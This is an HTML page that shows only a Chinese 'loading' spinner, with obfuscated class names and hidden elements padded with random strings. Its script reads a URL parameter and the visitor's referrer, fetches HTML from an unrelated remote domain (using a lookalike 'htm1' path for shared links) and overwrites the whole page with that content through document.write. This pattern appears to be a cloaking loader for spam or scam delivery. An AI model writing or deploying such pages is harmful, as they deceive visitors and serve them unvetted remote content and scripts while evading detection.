<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bnxN6zw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bnxN6zw .G3zvrO3zOa {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bnxN6zw .content {
            line-height: 50px;
            text-align: center
        }

        .bnxN6zw .img {
            width: 100%
        }

        .bnxN6zw .MFZkEYW {
            text-align: center
        }

        .bnxN6zw .MFZkEYW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bnxN6zw .MFZkEYW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bnxN6zw .MFZkEYW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bnxN6zw .MFZkEYW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bnxN6zw .MFZkEYW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bnxN6zw .MFZkEYW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bnxN6zw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function q6DCE2CyI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LCgMNeA = q6DCE2CyI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LCgMNeA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LCgMNeA +".html?a=share";
		}
		
        hN6oJZvI6c=url+"#"+new Date().getTime();
        hN6oJZvI6c && function() {
            $.get(hN6oJZvI6c, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>F2aE9zL6oApryj9VX87ZCDdeQKKdtnKcikm7NcoJ1KosPYTsky8ElUfoxHuiwfp8rBpPXUagX23UDC5q6PPdiSvX4mfFCSZgGLw6</a>
<ul style='display:none' >bb9ubBCV8QhwHkC7WMW2n7v6UHF9IjOFXvsitIsvoQylSv1doNTECQ2Q4vhr7ssrhwXr3w3maqgtnubXbg</ul>
<img  src='' style='display:none'>
<b style='display:none' >XpDyCyByvwkw3DxYXmSqBC60pun0I5XwAC14t1J3amQQc7EW</b><div class="bnxN6zw">
    <div class="G3zvrO3zOa">
        <div class="MFZkEYW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Ele0CHkWFMXvwT08kYHUMGH</p>
<li style='display:none' >iyU1zEtDqzhHM9xcu7Qwq5XJCszROP9Gqk2he</li>
<a  href='#' style='display:none'>PRDdhGCjOcN9SsaCk4LJzyLWjnnp8g1QwGzaqxzJ13A2vWhFP0AbXqrD</a>
<img  src='' style='display:none'>
<b style='display:none' >SGNAGeLc70bsg4JItHDyux1lNJzc52kbqd4KyqXTffJEm</b>
<ul style='display:none' >WsTXjbtXOVlesx1CVv3GCglkYoDRd</ul>
<div style='display:none'>Uv2gVijhpRHzox9j4iS1L9AoA</div></body>
</html>